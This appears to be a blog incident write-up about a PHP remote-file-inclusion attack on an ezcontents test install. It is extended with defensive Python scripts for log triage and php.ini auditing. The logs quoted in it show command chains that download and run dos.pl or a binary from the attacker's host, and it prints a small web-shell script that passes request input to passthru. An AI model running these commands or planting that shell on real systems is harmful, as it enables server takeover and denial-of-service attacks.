More details on php exploit from last week



Ok, I have a bit of time to sit down and get a little more detailed about what specifically happened late last week that shut the site down for a couple of days.

At one point I had updated the ezcontents script for the main site (averyjparker.com), but I had left (for about 2 years) a testbed install at averyjparker.com/ncgen2 where I was trying to set up a platform for an upgrade of the old genealogy site (www.averyjparker.com/ncgen; the new site is now at www.northcarolinagenealogy.net, linked at the top of the page). OK, so in searching through the logs, here are some of the entries that caught my attention.

63.85.41.229 - - [14/Jul/2005:13:30:31 -0600] "POST /cgi-bin/cgiemail/forms/order.txt HTTP/1.1" 403 319 "http://www.averyjparker.com/" "-"
200.174.133.132 - - [14/Jul/2005:13:11:59 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:01 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:42 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl HTTP/1.1" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"

I guess I should preface this with a simple fact: there are a LOT of exploit attempts that show up in webserver logs. Here's a sample of one…
211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"

The first entry is the IP address, then the datestamp, then the specific request (usually starting with POST or GET and ending with the version of the protocol). Next you see 404; that's the result code, and a 404 code means that this file wasn't found.

What troubled me with the suspicious entries is that the result code was 200 (file found) and it was trying to pass various different bits of information to a php file (/ncgen2//include/db.php) which did exist.
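As an added example (not code from this post), here is a small Python triage script that parses Apache combined-format lines like the ones above, decodes the query string, and flags the same things the post picks out by eye: a parameter whose value is itself a URL, a cmd= parameter carrying shell separators, and a 200 status showing that the targeted script actually existed and ran. The sample lines are the post's own entries re-joined onto single lines; the regex, indicator names and record layout are my own.

```python
"""Flag Apache combined-log entries that look like PHP remote file inclusion
(RFI) attempts. Added example for this post, not the author's code; the
sample lines are the entries quoted in the post, joined back onto one line."""
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "method target proto" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
URL_PREFIXES = ("http://", "https://", "ftp://")
# Command separators an attacker needs to chain "cd ... ; wget ... ; perl ..."
SHELL_META = re.compile(r'[;|`]|&&|\$\(')

SAMPLE_LINES = [
    # Probe against a file that does not exist: answered 404, nothing ran.
    '211.75.91.2 - - [14/Jul/2005:13:30:24 -0600] "POST /cgi-bin/mailform.pl HTTP/1.0" 404 290 "http://www.averyjparker.com/" "-"',
    # RFI attempts answered 200, as quoted in the post.
    '200.174.133.132 - - [14/Jul/2005:13:09:21 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=wget HTTP/1.1" 200 1120 "-" "Mozilla/4.0 (compatible; MSIE6.0; Windows NT 5.0)"',
    '200.174.133.132 - - [14/Jul/2005:13:12:19 -0600] "GET /ncgen2//include/db.php?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20%20http://www.caniggiamatador.com/xpl/pdr%20;%20chmod%20777%20pdr;%20./pdr HTTP/1.1" 200 1072 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"',
]


def parse_line(line):
    """Split one combined-format line into its fields; None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def split_query(query):
    """Split a raw query string on '&' only and percent-decode each side.
    Done by hand rather than with urllib's parse_qsl because older Pythons
    also split on ';', which would chop the attacker's command chain apart."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def rfi_indicators(target):
    """Decode the request target and list what makes it look like an RFI or command-injection attempt."""
    path, _, query = target.partition("?")
    params = split_query(query)
    findings = []
    for name, value in params:
        if value.lower().startswith(URL_PREFIXES):
            findings.append(f"remote URL in parameter {name}")
        if SHELL_META.search(value):
            findings.append(f"shell metacharacters in parameter {name}: {value!r}")
    return path, params, findings


def triage(lines):
    """Return one record per suspicious line; served=True means the target script existed and answered 200."""
    hits = []
    for line in lines:
        fields = parse_line(line)
        if fields is None:
            continue
        path, params, findings = rfi_indicators(fields["target"])
        if not findings:
            continue
        hits.append({
            "ip": fields["ip"],
            "time": fields["time"],
            "path": path,
            "status": int(fields["status"]),
            "served": fields["status"] == "200",
            "indicators": findings,
            "cmd": dict(params).get("cmd"),
        })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE_LINES):
        print(hit["ip"], hit["status"], hit["path"], "|", "; ".join(hit["indicators"]))
```

triage() accepts any iterable of lines, so it can be pointed at a whole access log. The 404 and 403 probes the post mentions drop out because they carry no query-string indicators; entries with indicators and served=True are the ones that warrant the follow-up the post goes on to describe, since the script that was asked to fetch the remote file really was there to run.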

In fact, this bit
?GLOBALS[rootdp]=http://www.caniggiamatador.com/lila.jpg?&cmd=cd%20/tmp%20;%20wget%20http://www.caniggiamatador.com/dos.pl%20;%20perl%20dos.pl
made it look like they were trying to load this file from caniggiamatador.com. I looked at the source of lila.jpg (not a real image file, by the way). It's basically an HTML file wrapped around this…
<?
// CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
// $chdir and $cmd arrive straight from the query string (register_globals)
if (isset($chdir)) @chdir($chdir);
ob_start();
passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
$output = ob_get_contents();
ob_end_clean();
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
OK, so they're trying to inject these files: http://www.caniggiamatador.com/dos.pl and http://www.caniggiamatador.com/perldos.pl

I looked at the code there, and they were basically bash scripts that set up a denial of service attack on a specified target. Fairly clever, and commented in Portuguese or Spanish. I've actually spent some time studying Spanish, but there was a lot that was either misspelled or I simply didn't understand.

The site is down now, by the way. It looks like it was hosted by http://www.internetters.net/, and I suspect my service provider dealt with contacting them.

Since I'm a fairly curious person, I was also interested in the IP address that was originating the requests, 200.174.133.132. An IP whois lookup turned up this…

200.174.133.132 = [ 200-174-133-132-tau.cpe.vivax.com.br ]

I'm guessing a dialup (?) customer in Brazil, which might back up the comments being in Portuguese.

I, of course, sent what I found to my service provider. They thanked me for the time I'd spent researching the issue, verified that this was the file being exploited and that it was a DoS attack against their nameservers. They also sent along a couple of notes on changes they made to the php.ini to blunt the attack.

disabled_functions: system, cmd, shell_exec, passthru, popen

These were said to hopefully prevent a future breach by the same method.
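The directive the provider's note refers to is spelled disable_functions in php.ini, and cmd in that list is not a PHP function (it is the name of the attacker's query parameter), so the list as written covers system, shell_exec, passthru and popen. Disabling functions only limits what an injected script can call once PHP is already running it; the inclusion itself rode on register_globals (which turned GLOBALS[rootdp] into a script variable) and on URL wrappers being allowed for include(), governed by allow_url_fopen before PHP 5.2 and by allow_url_include from 5.2 on. As an added example, not the post's or the provider's own configuration, the Python checker below reads php.ini text and reports which of those settings are still open. All three ini samples are constructed; the middle one assumes the post's list was dropped into an otherwise permissive config, since the post does not show the rest of the file.

```python
"""Audit php.ini text for the settings that made the remote-file-inclusion
chain in the post work. Added example, not the post's or the hosting
provider's configuration; all three ini samples below are constructed."""

# Built-in defaults used when a directive is absent: register_globals has
# defaulted to Off since PHP 4.2, allow_url_fopen to On, allow_url_include to Off.
DEFAULTS = {
    "register_globals": False,
    "allow_url_fopen": True,
    "allow_url_include": False,
}
# Functions that hand a string to a shell or spawn a process.
EXEC_FUNCTIONS = {"system", "shell_exec", "passthru", "popen", "exec", "proc_open"}
ON_VALUES = {"on", "1", "true", "yes"}

WEAK_INI = """; constructed: a permissive shared-host php.ini of the era
[PHP]
register_globals = On
allow_url_fopen = On
disable_functions =
"""

PROVIDER_INI = """; constructed: the post's disable_functions list, everything else left as-is
register_globals = On
allow_url_fopen = On
disable_functions = system, cmd, shell_exec, passthru, popen
"""

HARDENED_INI = """; constructed: closes both the inclusion step and the execution step
register_globals = Off
allow_url_fopen = Off
allow_url_include = Off   ; PHP 5.2 and later
disable_functions = system, shell_exec, passthru, popen, exec, proc_open
"""


def parse_php_ini(text):
    """Minimal php.ini reader: key = value lines, ';' comments, [sections] skipped."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"')
    return settings


def is_on(settings, key):
    """Interpret a PHP boolean directive, falling back to the built-in default."""
    value = settings.get(key)
    if value is None:
        return DEFAULTS[key]
    return value.lower() in ON_VALUES


def audit(settings):
    """Return (directive, problem) pairs for settings that leave the RFI path open."""
    findings = []
    if is_on(settings, "register_globals"):
        findings.append(("register_globals",
                         "request parameters such as GLOBALS[rootdp] become script variables"))
    if is_on(settings, "allow_url_fopen"):
        findings.append(("allow_url_fopen",
                         "URL wrappers enabled; before PHP 5.2 this alone lets include() pull a script over HTTP"))
    if is_on(settings, "allow_url_include"):
        findings.append(("allow_url_include",
                         "include()/require() accept http:// paths (PHP 5.2 and later)"))
    disabled = {name.strip().lower()
                for name in settings.get("disable_functions", "").split(",") if name.strip()}
    still_open = sorted(EXEC_FUNCTIONS - disabled)
    if still_open:
        findings.append(("disable_functions", "still callable: " + ", ".join(still_open)))
    return findings


def audit_text(text):
    """Convenience wrapper: php.ini text in, findings out."""
    return audit(parse_php_ini(text))


if __name__ == "__main__":
    for label, sample in (("weak", WEAK_INI), ("provider", PROVIDER_INI), ("hardened", HARDENED_INI)):
        print(label, audit_text(sample) or "no findings")
```

Run against the middle sample, the checker still reports register_globals and allow_url_fopen as open and notes that exec and proc_open remain callable, which is the practical point: the disable_functions list raises the bar for what the injected shell can do, but the hole the attacker came through is closed by the first three directives.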

Some details of the exploit can be found here.
ezcontents code injection vulnerability

So, how did they find my site to attack? Who knows for certain, but I do have some ideas. I plan to detail those in an upcoming post.
